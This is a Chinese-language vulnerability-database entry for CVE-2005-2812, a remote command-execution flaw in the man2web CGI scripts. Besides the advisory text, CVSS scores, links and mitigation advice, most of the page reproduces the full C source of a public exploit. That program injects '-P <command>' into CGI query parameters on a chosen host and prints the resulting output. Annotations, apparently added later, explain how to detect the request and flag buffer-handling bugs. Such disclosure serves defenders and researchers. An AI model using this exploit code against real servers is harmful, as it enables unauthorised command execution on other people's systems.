CVE-2005-2812
CVSS7.5
发布时间 :2005-09-07 14:03:00
修订时间 :2008-09-05 16:52:45
NMCOE    

[原文]man2web allows remote attackers to execute arbitrary commands via -P arguments.


[CNNVD]man2web远程命令执行漏洞(CNNVD-200509-048)

        man2web是一种在Web页面上显示手册页的软件。
        man2web在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。man2web的多个脚本没有正确过滤请求参数,而是直接用这些参数拼接出交由Shell执行的命令行;攻击者可在参数中嵌入-P选项及shell命令,使其在服务器上被执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:man2web:man2web:0.88
cpe:/a:man2web:man2web:0.87

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2812
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2812
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-048
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/14747
(UNKNOWN)  BID  14747

- 漏洞信息

man2web远程命令执行漏洞
高危 输入验证
2005-09-07 00:00:00 2005-10-20 00:00:00
远程  
        man2web是一种在Web页面上显示手册页的软件。
        man2web在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。man2web的多个脚本没有正确过滤请求参数,而是直接用这些参数拼接出交由Shell执行的命令行;攻击者可在参数中嵌入-P选项及shell命令,使其在服务器上被执行。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序。在补丁发布之前,建议停用相关CGI脚本或限制对其的访问,并在Web服务器或过滤代理上拒绝取值以“-”开头的查询参数。我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://man2web.sourceforge.net/

- 漏洞信息 (1194)

man2web <= 0.88 Multiple Remote Command Execution Exploit (update2) (EDBID:1194)
cgi webapps
2005-09-04 Verified
0 tracewar
N/A [点击下载]
/*
 * str0ke@server:~$ ./test some.edu "w" /cgi-bin/man2web 80 1
 * /str0ke
 */
 
 /* dl-mancgi.c v0.2
  * x86/linux multiple man2web cgi-scripts remote command spawn
  * found and coded by tracewar	(darklogic team)		 
  * for educational purposes only.
  *****************************************************************	
  * greetz goes to:						
  * matan peretz, ofer shaked, setuid, alex, majestic 
  */
 
 
 #include <stdio.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netdb.h>
 
 /*
  * Print the banner, the list of target selectors and the invocation
  * syntax to stderr, then end the process with exit status 0.
  *
  * argv0: program name substituted into the usage and example lines.
  */
 void usage(char *argv0) {
         /* Fixed part of the help text; adjacent literals are joined by the compiler. */
         static const char banner[] =
                 "x86/linux multipie man2web cgi-scripts remote command spawn\n"
                 "researched by tracewar\n"
                 "targets: \n0=man-cgi\n1=man2web\n2=man2html\n\n";

         fputs(banner, stderr);

         /* The two lines that embed the program name. */
         fprintf(stderr,
                 "usage: %s <remote_host> <command> <path> <http server port> <target>\n"
                 "example: %s 1.2.3.4 w /cgi-bin/man-cgi 80 0\n",
                 argv0, argv0);

         exit(0);
 }
 
 /*
  * Proof-of-concept client for the "-P" argument issue this page files
  * under CVE-2005-2812.
  *
  * Arguments, as they are read below:
  *   argv[1]  host name to resolve and connect to
  *   argv[2]  text placed after "-P" in the query string
  *   argv[3]  URL path of the CGI script
  *   argv[4]  TCP port of the web server
  *   argv[5]  target selector 0, 1 or 2; it picks the query-string layout
  *            and the HTML markers used to cut the reply
  *
  * Flow: build the query string, rewrite spaces as %20, send one request
  * line, read the whole reply, print the text found between the markers.
  * Returns 0 on success; the error paths return printf()'s character
  * count, so the exit status is non-zero but carries no meaning.
  *
  * What a defender can take from it: the request is a bare
  * "GET <path>?..." line ended by CRLF, with no HTTP version and no
  * headers, and its query string always contains "-P". Both traits can be
  * matched in web-server access logs or at a filtering proxy. -P is man's
  * pager-selection option, which is why a CGI that hands the parameter to
  * man unfiltered ends up running the supplied text.
  */
 int main(int argc, char **argv) {
         int sock, i, j, len = 0;
         struct sockaddr_in serv_addr;
         struct hostent *crap;
 	/* dummy holds the raw query first and the server reply later; buffer
 	 * holds the request line. Initialising buffer from a string literal
 	 * zero-fills the rest of the array. */
 	char *cp, dummy[50000], buffer[2000] = "GET ";	
         /* Five arguments are required; usage() exits the process. */
         if(argc < 6)
            usage(argv[0]);
 	/* Target 0: the whole query string is the option,
 	 * "<path>?-P <argv[2]> ls". */
 	if(atoi(argv[5]) == 0) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?-P ");
 			strcat(dummy, argv[2]);
 			strcat(dummy, " ls");} 
 	/* Target 1: the option rides in the "program" parameter,
 	 * "<path>?program=-P <argv[2]> ls". */
 	else if(atoi(argv[5]) == 1) {
               		memset(dummy, 0x00, 50000);
              		strcat(dummy, argv[3]);
             	 	strcat(dummy, "?program=-P ");
            	        strcat(dummy, argv[2]);
            	        strcat(dummy, " ls");}
 	/* Target 2: the option rides in the "section" parameter with no space
 	 * after -P, "<path>?section=-P<argv[2]>&topic=w". */
 	else if(atoi(argv[5]) == 2) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?section=-P");
 			strcat(dummy, argv[2]);
 			strcat(dummy, "&topic=w");}
 	else
 		usage(argv[0]);
 
 	printf("# crafting buffer string ... ");
 	/* Copy dummy into buffer after "GET " (j starts at 4), writing each
 	 * space as "%20". strcat finds the end because everything past the
 	 * last byte written is still zero.
 	 * NOTE(review): nothing bounds the result against buffer's 2000
 	 * bytes, nor the strcat chains above against dummy's 50000. */
          for(i=0, j=4;i < strlen(dummy);i++) {
 		if(dummy[i] == ' ') {
 			strcat(buffer, "%20");
 			j+=3;}
 		else {
 			buffer[j] = dummy[i];
 			j++;}
 	}
         
 	/* The request line ends here: no " HTTP/1.x" suffix and no headers. */
 	strcat(buffer, "\r\n");
         printf("(done)\n");
         sock = socket(AF_INET, SOCK_STREAM, 0);
         if(sock < 0)
                 return printf("# error creating socket.\n");
         crap = gethostbyname(argv[1]);
         if(crap == NULL)
                 return printf("# cant resolve the specified hostname: %s\n", argv[1]);
         else
                 printf("# connecting to victim... ");
 
         /* Fill in family, port (argv[4]) and the first resolved address. */
         serv_addr.sin_family = AF_INET;
 	serv_addr.sin_port = htons(atoi(argv[4]));
         bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
 
         /* NOTE(review): the message below formats atoi(argv[3]), which is
          * the path argument, not the port in argv[4]. */
         if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
                 return printf("(error)\n# check again %s:%d\n", argv[1], atoi(argv[3]));
 
         printf("(done)\n# sending crafted string... ");
         if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
                 return printf("\n# error while sending the crafted string.!\n");
         printf("(done)\n# waiting for our call ...\n");
 	/* Both arrays are reused: buffer as the receive chunk, dummy as the
 	 * accumulated reply. */
 	memset(buffer, 0x00, 2000);
 	memset(dummy, 0x00, 50000);
 	printf("\n\n");
 	/* Append each received chunk until recv() returns 0 or an error.
 	 * NOTE(review): buffer is not cleared between reads and a full
 	 * 2000-byte read leaves it without a terminator; the total is not
 	 * bounded against dummy either. */
 	while(recv(sock, buffer, 2000, 0) > 0)
 		strcat(dummy, buffer);
 
 	/* cp walks the reply; i counts the offset of the opening marker and j
 	 * the steps taken in the second scan, both capped by len. */
 	cp = &dummy[0];
 	i = 0; j = 0;
 	len = strlen(dummy);
 
         /* Target 0: keep the text after the first "<hr>" and cut it at the
          * next "<hr>" or "<A". */
         if(atoi(argv[5]) == 0) {
                 while(strncmp(cp, "<hr>", 4) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 4;
         }
 
         /* Target 1: find the opening pre tag, cut at the next "pre", and
          * start printing 6 bytes past the tag's first byte.
          * NOTE(review): \< and \> are not standard escape sequences;
          * presumably the compiler reads them as plain '<' and '>' - confirm. */
         else if(atoi(argv[5]) == 1) {
                 while(strncmp(cp, "\<pre\>", 5) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "pre", 3) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 6;
         }
 
         /* Target 2: same idea with upper-case "PRE" as both markers. */
         else if(atoi(argv[5]) == 2) {
                 while(strncmp(cp, "PRE", 3) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=2;
                 while(strncmp(cp, "PRE", 3) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 2;
         }
 
 	/* An empty string at cp is reported as a bad response. */
 	if(*cp == '\0')
 		return printf("# Bad response from the server.\n");
 
         printf("%s", cp);
 	printf("\n\n");
         close(sock);
         return 0;
 }

// milw0rm.com [2005-09-04]
		

- 漏洞信息

19515
man2web man2web CGI Arbitrary Command Execution
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-09-06 Unknown
Unknown Unknown

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
